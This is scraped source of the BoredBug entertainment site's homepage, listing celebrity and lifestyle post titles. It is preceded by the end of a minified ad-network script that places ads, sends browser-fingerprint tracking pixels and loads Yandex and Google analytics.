t=e.displayHost+"p/"+e.adBlockId+"/?source="+encodeURIComponent(e.sourceURL)+"&ref="+encodeURIComponent(e.sourceRef)+"&ent="+bmblocks.idEntropy+"&we="+bmblocks.we+"&fid="+bmblocks.fid+"&fidnoua="+bmblocks.fidnoua+"&impid="+bmblocks.impUuid+"&ua="+encodeURIComponent(e.userAgent)+"&sig=0x00000&blocksubid="+e.blockSubId,o=bmblocks[e.adBlockId][e.blockSubId],n=document.getElementsByClassName(e.blockClass)[o];if(function(e){for(var t=e.getBoundingClientRect(),o=t.left;o<t.right;o+=15)for(var n=t.top;n<t.bottom;n+=15){var i=document.elementFromPoint(o,n);if(null!=i&&i!=e)return!0}return!1}(n)){var i=e.displayHost+"pb/"+e.publId+"/"+e.adBlockId+"?type=overlapping&fid="+bmblocks.fid+"&fidnoua="+bmblocks.fidnoua+"&ref="+encodeURIComponent(e.sourceRef)+"&impid="+bmblocks.impUuid;p(i)}var a=document.createElement("iframe");a.setAttribute("src",t),a.setAttribute("class",e.iframeClass),a.setAttribute("scrolling","no"),a.style.border="none",a.style.width=n.style.width,a.style.height=n.style.height,e.adWidth=n.style.width,e.adHeight=n.style.height,n.appendChild(a)},d=function(e){var t=bmblocks[e.adBlockId][e.blockSubId],o=document.getElementsByClassName(e.iframeClass)[t];void 0!==o&&o.parentNode.removeChild(o),g(e.blockSubId),e.adRemoved=!0},l=function(e){if(0==(null!=e.offsetParent))return!1;var t=e.getBoundingClientRect(),o=0<=t.top&&t.top<(window.innerHeight||document.documentElement.clientHeight),n=0<=t.bottom&&t.bottom<(window.innerHeight||document.documentElement.clientHeight),i=0<=t.left&&t.left<(window.innerWidth||document.documentElement.clientWidth),a=0<=t.right&&t.right<(window.innerWidth||document.documentElement.clientWidth);if((o||n)&&(i||a))if(o&&i){if(document.elementFromPoint(t.left,t.top)===e||e.contains(document.elementFromPoint(t.left,t.top))||document.elementFromPoint(t.left,t.top).contains(e))return!0}else if(o&&a){if(document.elementFromPoint(t.right,t.top)===e||e.contains(document.elementFromPoint(t.right,t.top))||document.elementFromPoint(t.right,t.top).contains(e))return!0}else if(n&&i){if(document.elementFromPoint(t.left,t.bottom)===e||e.contains(document.elementFromPoint(t.left,t.bottom))||document.elementFromPoint(t.left,t.bottom).contains(e))return!0}else if(n&&a&&(document.elementFromPoint(t.right,t.bottom)===e||e.contains(document.elementFromPoint(t.right,t.bottom))||document.elementFromPoint(t.right,t.bottom).contains(e)))return!0;return!1},u=function(e,t){var o=document.getElementsByClassName(e.blockClass)[e.blockSubId];!function(e,t){var o=document.createElement("div");o.innerHTML=e;for(var n=o.getElementsByTagName("*"),i=0;i<n.length;i++){for(var a=document.createElement(n[i].tagName),r=n[i].attributes,s=0;s<r.length;s++)atr=r[s],a.setAttribute(atr.name,atr.value);0==n[i].children.length&&(a.innerHTML=n[i].innerHTML),t.appendChild(a)}}(t.partnerCode,o)},h=function(e){switch(e.badType){case"replaced":document.getElementsByClassName(e.blockClass)[e.blockSubId].innerHTML=e.badCode;break;case"filled":document.getElementsByClassName(e.blockClass)[e.blockSubId].style.backgroundColor=e.badColor;break;case"adsense":!function(e){var t='<ins class="adsbygoogle" style="display:inline-block;width:'+e.badAdWidth+"px;height:"+e.badAdHeight+'px" data-ad-client="ca-pub-'+e.badAdClient+'" data-ad-slot="'+e.badAdSlot+'"></ins>';document.getElementsByClassName(e.blockClass)[e.blockSubId].innerHTML=t;var o=document.createElement("script");o.setAttribute("type","text/javascript"),o.setAttribute("language","JavaScript"),o.setAttribute("src","//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"),document.getElementsByTagName("body")[0].appendChild(o),(adsbygoogle=window.adsbygoogle||[]).push({})}(e);break;case"collapse":document.getElementsByClassName(e.blockClass)[e.blockSubId].style.width="0px",document.getElementsByClassName(e.blockClass)[e.blockSubId].style.height="0px"}},C=function(){i.adSuccess||i.adRemoved||(d(i),h(i))},p=function(e){var t=document.createElement("img"),o=e;t.setAttribute("src",o),t.setAttribute("id",i.publId),t.style.display="none",t.onload=t.onerror=function(){n.removeChild(t)};var n=document.getElementsByTagName("body")[0];n.appendChild(t)},m=function(e,t){if(l(e)&&(t+=200),t>=i.trackViewPortTimer)return o=i.displayHost+"confirm/"+i.ClickId+"/",p(o),!0;var o;setTimeout(function(){m(e,t)},200)},b=function(e){if(e.data)try{var t=JSON.parse(e.data);if(t.token&&i.adBlockId===t.adBlockId&&t.blockSubId===i.blockSubId){send=!0;var o=new XMLHttpRequest,n=i.displayHost+"reconfirm/?clickid="+t.clickId+"&token="+t.token;o.open("GET",n,!0),o.send()}}catch(e){}},f=function(e){if(e.origin.slice(e.origin.search(":")+1)+"/"!==i.displayHost.slice(i.displayHost.search(":")+1))return!1;!function(){if(0==parseInt(i.TrackYandex)||void 0!==window.BitMediaYaCounter)return;window.BitMediaYaCounter={};var e=document.getElementsByTagName("script")[0],t=document.createElement("script"),o=function(){e.parentNode.insertBefore(t,e)};t.type="text/javascript",t.async=!0,t.src="https://mc.yandex.ru/metrika/watch.js",t.onload=function(){window.BitMediaYaCounter=new Ya.Metrika({id:i.YaCounterID,clickmap:!0,trackLinks:!0,accurateTrackBounce:!0,webvisor:!0})},"[object Opera]"==window.opera?document.addEventListener("DOMContentLoaded",o,!1):o()}();var t,o,n=JSON.parse(e.data);switch(n.status){case"bitMediaAdLoaded":n.destinationBlockId===i.adBlockId&&n.blockSubId===i.blockSubId&&(i.adSuccess=!0,i.adId=n.adId,(1===parseInt(i.TrackImpression)||parseInt(n.EnbriteLyTrack))&&function(){var e=document.createElement("script");e.type="text/javascript";var t="https://df3a34acb7eb1321d99f-2366b89f86f9049a8d564854bcebe54e.ssl.cf5.rackcdn.com/gerbil-2.1.6.1.js?wsid=bitmedia&banh="+i.adHeight+"&banw="+i.adWidth+"&sid="+i.SessionId+"&iid="+bmblocks.impUuid+"&pid="+i.SourceId+"&purl="+encodeURIComponent(i.sourceURL)+"&adid="+i.adId+"&zid=&curl="+encodeURIComponent(i.sourceRef);e.src=t,document.body.appendChild(e)}(),0<n.trackViewPortTimer&&(i.trackViewPortTimer=n.trackViewPortTimer,i.ClickId=n.ClickId,t=bmblocks[i.adBlockId][i.blockSubId],o=document.getElementsByClassName(i.blockClass)[t],m(o,0)));break;case"bitMediaPartnerAdLoaded":n.destinationBlockId===i.adBlockId&&n.blockSubId===i.blockSubId&&(document.getElementsByClassName(i.blockClass)[i.blockSubId].innerHTML="",u(i,n));break;case"noBitMediaContent":n.destinationBlockId===i.adBlockId&&n.blockSubId===i.blockSubId&&(d(i),h(i))}},g=function(e){bmblocks[i.adBlockId][e]=-1;for(var t=e+1;t<bmblocks[i.adBlockId].length;t++)bmblocks[i.adBlockId][t]--},B={changed:!0,setChanged:function(){this.changed=!0},checkAndRun:function(){if(this.changed){var e=document.getElementsByClassName(i.blockClass)[i.blockSubId];l(e)&&(clearInterval(y),clearInterval(k),window.removeEventListener("scroll",B.setChanged),window.removeEventListener("resize",B.setChanged),s(i),addEventListener("message",f),addEventListener("message",b),setTimeout(C,1e3*i.loadTime)),this.changed=!1}}};if(i.badCode=c.decode(i.badCode),i.displayHost=(e=i,o=window.location.protocol,"http:"!=window.location.protocol&&"https:"!=window.location.protocol&&(o="https:"),o+e.displayHost),function(){for(var e=document.getElementById(i.blockClass);null!==e;)e.setAttribute("class",i.blockClass),e.removeAttribute("id"),e=document.getElementById(i.blockClass)}(),i.blockSubId="undefined"==typeof bmblocks?(window.bmblocks={},bmblocks[i.adBlockId]=[0],0):void 0===bmblocks[i.adBlockId]?(bmblocks[i.adBlockId]=[0],0):(bmblocks[i.adBlockId].push(bmblocks[i.adBlockId][bmblocks[i.adBlockId].length-1]+1),bmblocks[i.adBlockId][bmblocks[i.adBlockId].length-1]),function(){if("undefined"!=typeof bmblocks&&(void 0===bmblocks.impUuid&&(bmblocks.impUuid=r.new()),void 0===bmblocks.fid)){var e=new t({});e.init(),bmblocks.fid=e.get(),bmblocks.fidnoua=e.getNoUA(),bmblocks.we=e.isWebRTCSupported()?"1":"0",bmblocks.idEntropy=e.getEntropy()}}(),function(){if(void 0===bmblocks.pubIds||-1===bmblocks.pubIds.indexOf(i.publId)){bmblocks.pubIds?bmblocks.pubIds.push(i.publId):bmblocks.pubIds=[i.publId];var e=document.createElement("img"),t=i.displayHost+"pv/"+i.publId+"/?source="+encodeURIComponent(i.sourceURL)+"&ref="+encodeURIComponent(i.sourceRef)+"&ent="+bmblocks.idEntropy+"&we="+bmblocks.we+"&fid="+bmblocks.fid+"&fidnoua="+bmblocks.fidnoua+"&ua="+encodeURIComponent(i.userAgent)+"&sig=0x00000&blocksubid=0&impid="+bmblocks.impUuid;e.setAttribute("src",t),e.setAttribute("id",i.publId),e.style.display="none";var o=document.getElementsByTagName("body")[0];e.onload=function(){o.removeChild(e)},e.onerror=function(){o.removeChild(e)},o.appendChild(e)}}(),window.top!=window.self){var A=i.displayHost+"pb/"+i.publId+"/"+i.adBlockId+"?type=iframe&fid="+bmblocks.fid+"&fidnoua="+bmblocks.fidnoua+"&ref="+encodeURIComponent(i.sourceRef)+"&impid="+bmblocks.impUuid;p(A)}window.addEventListener("scroll",B.setChanged),window.addEventListener("resize",B.setChanged);var y=setInterval(B.checkAndRun,100),k=setInterval(B.setChanged,400)}();
0
<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" id="ao_optimized_gfonts" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro%3A300%2C400%2C700" /><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="https://boredbug.com/xmlrpc.php"><link type="text/css" media="screen" href="https://boredbug.com/wp-content/cache/autoptimize/css/autoptimize_80ea2e5029784c7e6e2e79c7f074e835.css" rel="stylesheet" /><link type="text/css" media="all" href="https://boredbug.com/wp-content/cache/autoptimize/css/autoptimize_7f0c2788f42a05e91cc8ab2eefe1640b.css" rel="stylesheet" /><title>BoredBug | cure your boredom!</title><meta name="description" content="cure your boredom!" /><meta property="og:image" content="https://boredbug.com/wp-content/uploads/2018/12/cropped-boredbug150.png" /><meta property="og:image:width" content="512" /><meta property="og:image:height" content="512" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="website" /><meta property="og:title" content="BoredBug | cure your boredom!" /><meta property="og:description" content="cure your boredom!" /><meta property="og:url" content="https://boredbug.com/" /><meta property="og:site_name" content="BoredBug" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="BoredBug | cure your boredom!" /><meta name="twitter:description" content="cure your boredom!" /><meta name="twitter:image" content="https://boredbug.com/wp-content/uploads/2018/12/cropped-boredbug150.png" /><meta name="twitter:image:width" content="512" /><meta name="twitter:image:height" content="512" /><link rel="canonical" href="https://boredbug.com/" /><link rel="next" href="https://boredbug.com/page/2/" /> <script type="application/ld+json">{"@context":"https://schema.org","@type":"WebSite","url":"https://boredbug.com/","name":"BoredBug","potentialAction":{"@type":"SearchAction","target":"https://boredbug.com/search/{search_term_string}","query-input":"required name=search_term_string"}}</script> <script type="application/ld+json">{"@context":"https://schema.org","@type":"Organization","url":"https://boredbug.com/","name":"BoredBug","logo":"https://boredbug.com/wp-content/uploads/2018/12/cropped-boredbug150.png"}</script> <link rel='dns-prefetch' href='//s.w.org' /><link href='https://fonts.gstatic.com' crossorigin='anonymous' rel='preconnect' /><link rel="alternate" type="application/rss+xml" title="BoredBug &raquo; Feed" href="https://boredbug.com/feed/" /><link rel="alternate" type="application/rss+xml" title="BoredBug &raquo; Comments Feed" href="https://boredbug.com/comments/feed/" /> <script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/boredbug.com\/wp-includes\/js\/wp-emoji-release.min.js"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);</script> <script> advanced_ads_ready=function(){var fns=[],listener,doc=typeof document==="object"&&document,hack=doc&&doc.documentElement.doScroll,domContentLoaded="DOMContentLoaded",loaded=doc&&(hack?/^loaded|^c/:/^loaded|^i|^c/).test(doc.readyState);if(!loaded&&doc){listener=function(){doc.removeEventListener(domContentLoaded,listener);window.removeEventListener("load",listener);loaded=1;while(listener=fns.shift())listener()};doc.addEventListener(domContentLoaded,listener);window.addEventListener("load",listener)}return function(fn){loaded?setTimeout(fn,0):fns.push(fn)}}(); </script> <script type='text/javascript' src='https://boredbug.com/wp-includes/js/jquery/jquery.js'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://boredbug.com/wp-content/themes/twentyfifteen/js/html5.js'></script> <![endif]--><link rel='https://api.w.org/' href='https://boredbug.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://boredbug.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://boredbug.com/wp-includes/wlwmanifest.xml" /><link rel="icon" href="https://boredbug.com/wp-content/uploads/2018/12/cropped-boredbug150-32x32.png" sizes="32x32" /><link rel="icon" href="https://boredbug.com/wp-content/uploads/2018/12/cropped-boredbug150-192x192.png" sizes="192x192" /><link rel="apple-touch-icon-precomposed" href="https://boredbug.com/wp-content/uploads/2018/12/cropped-boredbug150-180x180.png" /><meta name="msapplication-TileImage" content="https://boredbug.com/wp-content/uploads/2018/12/cropped-boredbug150-270x270.png" /> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-54784318-1', 'auto'); ga('send', 'pageview');</script> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script>(adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-2763588259572159", enable_page_level_ads: true });</script></head><body class="home blog group-blog"><header id="masthead" class="site-header" role="banner"><div class="site-branding"><h1 class="site-title"><a href="https://boredbug.com/" rel="home"><img src="https://boredbug.com/wp-content/uploads/2016/04/ladybug_static.gif"></a></h1><p class="site-description">cure your boredom!</p><div class="top-header-ad"></div><nav id="site-navigation" class="main-navigation" role="navigation"> <button class="menu-toggle">Menu<i class="fa fa-align-justify"></i></button><div class="menu-nbb-primary-container"><ul id="menu-nbb-primary" class="menu"><li id="menu-item-16862" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-16862"><a title="Celebs • Movies • TV • Music" href="https://boredbug.com/category/entertainment-2/">Entertainment</a><ul class="sub-menu"><li id="menu-item-16886" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16886"><a href="https://boredbug.com/category/entertainment-2/celebrities/">Celebrity</a></li><li id="menu-item-16866" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16866"><a href="https://boredbug.com/category/entertainment-2/movies-celebrities/">Movies</a></li><li id="menu-item-16867" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16867"><a href="https://boredbug.com/category/entertainment-2/music/">Music</a></li><li id="menu-item-16868" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16868"><a href="https://boredbug.com/category/entertainment-2/tv/">TV</a></li></ul></li><li id="menu-item-16874" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-16874"><a title="Love • Food • Travel" href="https://boredbug.com/category/lifestyle/">Lifestyle</a><ul class="sub-menu"><li id="menu-item-16875" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16875"><a href="https://boredbug.com/category/lifestyle/fitness/">Fitness</a></li><li id="menu-item-16876" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16876"><a href="https://boredbug.com/category/lifestyle/food/">Food</a></li><li id="menu-item-16877" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16877"><a href="https://boredbug.com/category/lifestyle/gaming-lifestyle/">Gaming</a></li><li id="menu-item-16878" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16878"><a href="https://boredbug.com/category/lifestyle/home-decor/">Home &#038; Decor</a></li><li id="menu-item-26928" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-26928"><a href="https://boredbug.com/category/lifestyle/pets-wildlife-lifestyle/">Pets &#038; Wildlife</a></li><li id="menu-item-16881" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16881"><a href="https://boredbug.com/category/lifestyle/relationship/">Relationship</a></li><li id="menu-item-16882" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16882"><a href="https://boredbug.com/category/lifestyle/travel/">Travel</a></li></ul></li><li id="menu-item-16869" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-16869"><a title="Clothing • Makeup" href="https://boredbug.com/category/fashion/">Fashion</a><ul class="sub-menu"><li id="menu-item-16870" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16870"><a href="https://boredbug.com/category/fashion/clothing/">Clothing</a></li><li id="menu-item-16871" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16871"><a href="https://boredbug.com/category/fashion/hair/">Hair</a></li><li id="menu-item-16872" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16872"><a href="https://boredbug.com/category/fashion/makeup/">Makeup</a></li><li id="menu-item-16873" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16873"><a href="https://boredbug.com/category/fashion/seasonal/">Seasonal</a></li></ul></li><li id="menu-item-16858" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-16858"><a title="Art • Photo" href="https://boredbug.com/category/diy/">DIY</a><ul class="sub-menu"><li id="menu-item-16859" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16859"><a href="https://boredbug.com/category/diy/arts-crafts/">Arts &#038; Crafts</a></li><li id="menu-item-16860" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16860"><a href="https://boredbug.com/category/diy/life-hacks-diy/">Life Hacks</a></li><li id="menu-item-16861" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16861"><a href="https://boredbug.com/category/diy/photography-diy/">Photography</a></li></ul></li><li id="menu-item-16853" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-16853"><a title="Money • Tech" href="https://boredbug.com/category/business/">Business</a><ul class="sub-menu"><li id="menu-item-16854" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16854"><a href="https://boredbug.com/category/business/money/">Money</a></li><li id="menu-item-16855" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16855"><a href="https://boredbug.com/category/business/productivity/">Productivity</a></li><li id="menu-item-16856" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16856"><a href="https://boredbug.com/category/business/shopping/">Shopping</a></li><li id="menu-item-16857" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16857"><a href="https://boredbug.com/category/business/technology/">Technology</a></li></ul></li></ul></div></nav></div><div class="site-social"><div class="socialLine"> <a href="#" title="Facebook"><i class="fa fa-facebook spaceLeftDouble"><span class="screen-reader-text">Facebook</span></i></a> <a href="#" title="Twitter"><i class="fa fa-twitter spaceLeftDouble"><span class="screen-reader-text">Twitter</span></i></a> <a href="#" title="Google Plus"><i class="fa fa-google-plus spaceLeftDouble"><span class="screen-reader-text">Google Plus</span></i></a> <a href="#" title="Linkedin"><i class="fa fa-linkedin spaceLeftDouble"><span class="screen-reader-text">Linkedin</span></i></a> <a href="#" title="Instagram"><i class="fa fa-instagram spaceLeftDouble"><span class="screen-reader-text">Instagram</span></i></a> <a href="#" title="YouTube"><i class="fa fa-youtube spaceLeftDouble"><span class="screen-reader-text">YouTube</span></i></a> <a href="#" title="Pinterest"><i class="fa fa-pinterest spaceLeftDouble"><span class="screen-reader-text">Pinterest</span></i></a> <a href="#" title="Tumblr"><i class="fa fa-tumblr spaceLeftDouble"><span class="screen-reader-text">Tumblr</span></i></a> <a href="#" title="VK"><i class="fa fa-vk spaceLeftDouble"><span class="screen-reader-text">VK</span></i></a> <a href="#" class="top-search"><i class="fa spaceLeftDouble fa-search"></i></a></div><div class="topSearchForm"><form role="search" method="get" class="search-form" action="https://boredbug.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /></form></div></div></header><div id="page" class="hfeed site"><div id="content" class="site-content"><div class="top-header-native"><center><div class="add-info">ADVERTISEMENT</div> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-2763588259572159" data-ad-slot="3018480626" data-ad-format="auto" data-full-width-responsive="true"></ins> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script> </div><div id="primary-home" class="content-area clear"><main id="main" class="site-main clear" role="main"><article id="post-87071" class="post-87071 post type-post status-publish format-standard has-post-thumbnail hentry category-celebrities category-entertainment-2 category-fashion category-gossip category-high-life category-movies-celebrities category-tv"><div class="entry-featuredImg"><a href="https://boredbug.com/tv-couples-that-became-real-life-couples/"><span class="overlay-img"></span><img width="226" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/01/kit-harington-rose-leslie-olivier-awards-02-e1464683351456.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" srcset="" data-srcset="https://boredbug.com/wp-content/uploads/2016/01/kit-harington-rose-leslie-olivier-awards-02-e1464683351456.jpg 630w, https://boredbug.com/wp-content/uploads/2016/01/kit-harington-rose-leslie-olivier-awards-02-e1464683351456-200x190.jpg 200w, https://boredbug.com/wp-content/uploads/2016/01/kit-harington-rose-leslie-olivier-awards-02-e1464683351456-300x285.jpg 300w" sizes="(max-width: 226px) 100vw, 226px" /><noscript><img width="226" height="215" src="https://boredbug.com/wp-content/uploads/2016/01/kit-harington-rose-leslie-olivier-awards-02-e1464683351456.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" srcset="https://boredbug.com/wp-content/uploads/2016/01/kit-harington-rose-leslie-olivier-awards-02-e1464683351456.jpg 630w, https://boredbug.com/wp-content/uploads/2016/01/kit-harington-rose-leslie-olivier-awards-02-e1464683351456-200x190.jpg 200w, https://boredbug.com/wp-content/uploads/2016/01/kit-harington-rose-leslie-olivier-awards-02-e1464683351456-300x285.jpg 300w" sizes="(max-width: 226px) 100vw, 226px" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/tv-couples-that-became-real-life-couples/" rel="bookmark">TV Couples That Became Real Life Couples</a></h2></header></div></div></div></article><div><div class="add-info">ADVERTISEMENT</div> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-2763588259572159" data-ad-slot="8808372660" data-ad-format="auto" data-full-width-responsive="true"></ins> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script> <br></div><article id="post-87070" class="post-87070 post type-post status-publish format-standard has-post-thumbnail hentry category-funny-section"><div class="entry-featuredImg"><a href="https://boredbug.com/the-royals-like-youve-never-seen-them/"><span class="overlay-img"></span><img width="325" height="171" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/04/prince-george-princess-charlotte-christening.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" srcset="" data-srcset="https://boredbug.com/wp-content/uploads/2016/04/prince-george-princess-charlotte-christening.jpg 728w, https://boredbug.com/wp-content/uploads/2016/04/prince-george-princess-charlotte-christening-200x105.jpg 200w, https://boredbug.com/wp-content/uploads/2016/04/prince-george-princess-charlotte-christening-300x157.jpg 300w" sizes="(max-width: 325px) 100vw, 325px" /><noscript><img width="325" height="171" src="https://boredbug.com/wp-content/uploads/2016/04/prince-george-princess-charlotte-christening.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" srcset="https://boredbug.com/wp-content/uploads/2016/04/prince-george-princess-charlotte-christening.jpg 728w, https://boredbug.com/wp-content/uploads/2016/04/prince-george-princess-charlotte-christening-200x105.jpg 200w, https://boredbug.com/wp-content/uploads/2016/04/prince-george-princess-charlotte-christening-300x157.jpg 300w" sizes="(max-width: 325px) 100vw, 325px" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/the-royals-like-youve-never-seen-them/" rel="bookmark">The Royals Like You&#8217;ve Never Seen Them</a></h2></header></div></div></div></article><article id="post-87059" class="post-87059 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized"><div class="entry-featuredImg"><a href="https://boredbug.com/is-melania-first-lady-material/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2017/02/melaniatrump_010616douglasfriedman-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2017/02/melaniatrump_010616douglasfriedman-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/is-melania-first-lady-material/" rel="bookmark">Is Melania First Lady Material?</a></h2></header></div></div></div></article><article id="post-87040" class="post-87040 post type-post status-publish format-standard has-post-thumbnail hentry category-celebrities category-music"><div class="entry-featuredImg"><a href="https://boredbug.com/bob-dylan-accepts-nobel-prize/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/12/bob-dylan-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/12/bob-dylan-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/bob-dylan-accepts-nobel-prize/" rel="bookmark">Bob Dylan Accepts Nobel Prize</a></h2></header></div></div></div></article><article id="post-87000" class="post-87000 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-celebrities category-crazy-section category-people"><div class="entry-featuredImg"><a href="https://boredbug.com/what-trump-doesnt-want-you-to-know/"><span class="overlay-img"></span><img width="325" height="215" src="//boredbug.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://boredbug.com/wp-content/uploads/2016/12/MarlaDish-1-325x215.jpg" class="lazy lazy-hidden attachment-home-post size-home-post wp-post-image" alt="" /><noscript><img width="325" height="215" src="https://boredbug.com/wp-content/uploads/2016/12/MarlaDish-1-325x215.jpg" class="attachment-home-post size-home-post wp-post-image" alt="" /></noscript></a></div><div class="header-caption"><div class="header-wrapper"><div class="header-inner"><header class="entry-header"><h2 class="entry-title"><a href="https://boredbug.com/what-trump-doesnt-want-you-to-know/" rel="bookmark">What Trump Doesn&#8217;t Want You To Know</a></h2></header></div></div></div></article><article id="post-86878" class="post-86878 post type-post status-publish format-standard has-post-thumbnail hentry category-crazy-section category-money category-productivity"><div class="entry-featuredImg"><a href="https://boredbug.com/steps-to-renounce-your-u-s-citizenship/"><span 